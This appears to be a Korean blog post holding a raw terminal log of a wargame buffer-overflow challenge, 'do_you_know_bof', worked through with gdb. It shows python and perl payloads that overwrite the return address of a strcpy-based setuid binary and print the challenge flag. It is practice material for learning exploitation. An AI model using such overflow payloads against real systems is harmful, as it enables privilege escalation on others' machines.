Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./do_you_know_bof...(no debugging symbols found)...done.
(gdb) b *bof+43
Breakpoint 1 at 0x8048570
(gdb) r $(python -c 'print "A"*245 + "\x0d\x85\x04\x08"')
Starting program: /home/do_you_know_bof/do_you_know_bof $(python -c 'print "A"*245 + "\x0d\x85\x04\x08"')
[Inferior 1 (process 3428) exited normally]
(gdb) i reg
The program has no registers now.
(gdb)
The program has no registers now.
(gdb)
The program has no registers now.
(gdb)
The program has no registers now.
(gdb) quit
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$ ls -al
total 20
drwxr-xr-x 2 root root 4096 Apr 7 15:41 .
drwxr-xr-x 6 root root 4096 Apr 8 02:11 ..
-rwsr-x--- 1 do_you_know_bof_solved do_you_know_bof 7569 Apr 7 15:40 do_you_know_bof
-r--r----- 1 root do_you_know_bof_solved 14 Apr 7 15:41 flag
do_you_know_bof@war02:~$ ls -l
total 12
-rwsr-x--- 1 do_you_know_bof_solved do_you_know_bof 7569 Apr 7 15:40 do_you_know_bof
-r--r----- 1 root do_you_know_bof_solved 14 Apr 7 15:41 flag
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$ cp do_you_know_bof do_you_know_bof
cp: 'do_you_know_bof' and 'do_you_know_bof' are the same file
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$ gdb ./do_you_know_bof
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./do_you_know_bof...(no debugging symbols found)...done.
(gdb) b *bof+43
Breakpoint 1 at 0x8048570
(gdb) r $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')
Starting program: /home/do_you_know_bof/do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')
do you know bof?
do you know bof?
Breakpoint 1, 0x08048570 in bof ()
(gdb) i reg
eax 0x11 17
ecx 0xf778d000 -143077376
edx 0xf7782898 -143120232
ebx 0xf7781000 -143126528
esp 0xff86464c 0xff86464c
ebp 0xff864600 0xff864600
esi 0x0 0
edi 0x0 0
eip 0x8048570 0x8048570 <bof+43>
eflags 0x282 [ SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
(gdb) x/32x %ebp
A syntax error in expression, near `%ebp'.
(gdb) x/32x $ebp
0xff864600: 0x41414141 0x41414141 0x41414141 0x41414141
0xff864610: 0x41414141 0x41414141 0x41414141 0x41414141
0xff864620: 0x41414141 0x41414141 0x41414141 0x41414141
0xff864630: 0x41414141 0x41414141 0x41414141 0x41414141
0xff864640: 0x41414141 0x0804850d 0xff864600 0x08048600
0xff864650: 0xff864ceb 0xff864660 0x0000000f 0xf760a42d
0xff864660: 0x795f6f64 0x6b5f756f 0x5f776f6e 0x00666f62
0xff864670: 0x08048610 0x00000000 0x00000000 0xf75f0a83
(gdb) x/x $esp
0xff86464c: 0x08048600
(gdb) quit
A debugging session is active.
Inferior 1 [process 3500] will be killed.
Quit anyway? (y or n) y
do_you_know_bof@war02:~$ gdb
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word".
(gdb)
(gdb) quit
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$ gdb ./do_you_know_bof
GNU gdb (Ubuntu 7.7.1-0ubuntu5~14.04.2) 7.7.1
Copyright (C) 2014 Free Software Foundation, Inc.
License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
This is free software: you are free to change and redistribute it.
There is NO WARRANTY, to the extent permitted by law. Type "show copying"
and "show warranty" for details.
This GDB was configured as "x86_64-linux-gnu".
Type "show configuration" for configuration details.
For bug reporting instructions, please see:
<http://www.gnu.org/software/gdb/bugs/>.
Find the GDB manual and other documentation resources online at:
<http://www.gnu.org/software/gdb/documentation/>.
For help, type "help".
Type "apropos word" to search for commands related to "word"...
Reading symbols from ./do_you_know_bof...(no debugging symbols found)...done.
(gdb) b *bof=43
Invalid cast.
(gdb) b *bof+43
Breakpoint 1 at 0x8048570
(gdb) r $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')
Starting program: /home/do_you_know_bof/do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*245 + "\x0d\x85\x04\x08"')
do you know bof?
do you know bof?
Breakpoint 1, 0x08048570 in bof ()
(gdb) i reg
eax 0x11 17
ecx 0xf77bc000 -142884864
edx 0xf77b1898 -142927720
ebx 0xf77b0000 -142934016
esp 0xffff0b9c 0xffff0b9c
ebp 0xffff0b00 0xffff0b00
esi 0x0 0
edi 0x0 0
eip 0x8048570 0x8048570 <bof+43>
eflags 0x286 [ PF SF IF ]
cs 0x23 35
ss 0x2b 43
ds 0x2b 43
es 0x2b 43
fs 0x0 0
gs 0x63 99
(gdb) disas $eip
Dump of assembler code for function bof:
0x08048545 <+0>: push %ebp
0x08048546 <+1>: mov %esp,%ebp
0x08048548 <+3>: sub $0x118,%esp
0x0804854e <+9>: mov 0x8(%ebp),%eax
0x08048551 <+12>: mov %eax,0x4(%esp)
0x08048555 <+16>: lea -0x108(%ebp),%eax
0x0804855b <+22>: mov %eax,(%esp)
0x0804855e <+25>: call 0x8048390 <strcpy@plt>
0x08048563 <+30>: movl $0x80486c1,(%esp)
0x0804856a <+37>: call 0x80483a0 <puts@plt>
0x0804856f <+42>: leave
=> 0x08048570 <+43>: ret
End of assembler dump.
(gdb) x/32x $ebp
0xffff0b00: 0x41414141 0x41414141 0x41414141 0x41414141
0xffff0b10: 0x41414141 0x41414141 0x41414141 0x41414141
0xffff0b20: 0x41414141 0x41414141 0x41414141 0x41414141
0xffff0b30: 0x41414141 0x41414141 0x41414141 0x41414141
0xffff0b40: 0x41414141 0x41414141 0x41414141 0x41414141
0xffff0b50: 0x41414141 0x41414141 0x41414141 0x41414141
0xffff0b60: 0x41414141 0x41414141 0x41414141 0x41414141
0xffff0b70: 0x41414141 0x41414141 0x41414141 0x41414141
(gdb) x/32x $esp
0xffff0b9c: 0x08048600 0xffff2ceb 0xffff0bb0 0x0000000f
0xffff0bac: 0xf763942d 0x795f6f64 0x6b5f756f 0x5f776f6e
0xffff0bbc: 0x00666f62 0x08048610 0x00000000 0x00000000
0xffff0bcc: 0xf761fa83 0x00000002 0xffff0c64 0xffff0c70
0xffff0bdc: 0xf77cecea 0x00000002 0xffff0c64 0xffff0c04
0xffff0bec: 0x0804a020 0x0804826c 0xf77b0000 0x00000000
0xffff0bfc: 0x00000000 0x00000000 0x5cf357f1 0x611073e0
0xffff0c0c: 0x00000000 0x00000000 0x00000000 0x00000002
(gdb) x/32x $esp-0x10
0xffff0b8c: 0x41414141 0x41414141 0x0804850d 0xffff0b00
0xffff0b9c: 0x08048600 0xffff2ceb 0xffff0bb0 0x0000000f
0xffff0bac: 0xf763942d 0x795f6f64 0x6b5f756f 0x5f776f6e
0xffff0bbc: 0x00666f62 0x08048610 0x00000000 0x00000000
0xffff0bcc: 0xf761fa83 0x00000002 0xffff0c64 0xffff0c70
0xffff0bdc: 0xf77cecea 0x00000002 0xffff0c64 0xffff0c04
0xffff0bec: 0x0804a020 0x0804826c 0xf77b0000 0x00000000
0xffff0bfc: 0x00000000 0x00000000 0x5cf357f1 0x611073e0
(gdb) quit
A debugging session is active.
Inferior 1 [process 3565] will be killed.
Quit anyway? (y or n) y
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$
do_you_know_bof@war02:~$ ./do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*253 + "\x0d\x85\x04\x08"')
do you know bof?
do you know bof?
Its_show_time
do_you_know_bof@war02:~$ ./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`
do_you_know_bof@war02:~$ ./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"\x0d\x85\x04\x08";'`
do you know bof?
do you know bof?
Its_show_time
do_you_know_bof@war02:~$ ./do_you_know_bof do_you_know_bof`perl -e 'print "A"x253,"x0d850408";'`
do you know bof?
do you know bof?
Segmentation fault
do_you_know_bof@war02:~$ ^C
do_you_know_bof@war02:~$ ./do_you_know_bof $(python -c 'print "do_you_know_bof" + "A"*253 + "\x0d\x85\x04\x08"')
do you know bof?
do you know bof?
Its_show_time
do_you_know_bof@war02:~$
'Wargame' 카테고리의 다른 글
| BOF 샘플 (0) | 2016.04.22 |
|---|---|
| suninatas.com 8번 문제 풀이 (1) | 2014.09.23 |
| 추천 워게임 사이트 써니나타스 (0) | 2013.04.18 |
| webhacking.kr 55번 문제 풀이 (0) | 2013.03.04 |
| webhacking.kr 56번 문제 풀이 (4) | 2013.03.04 |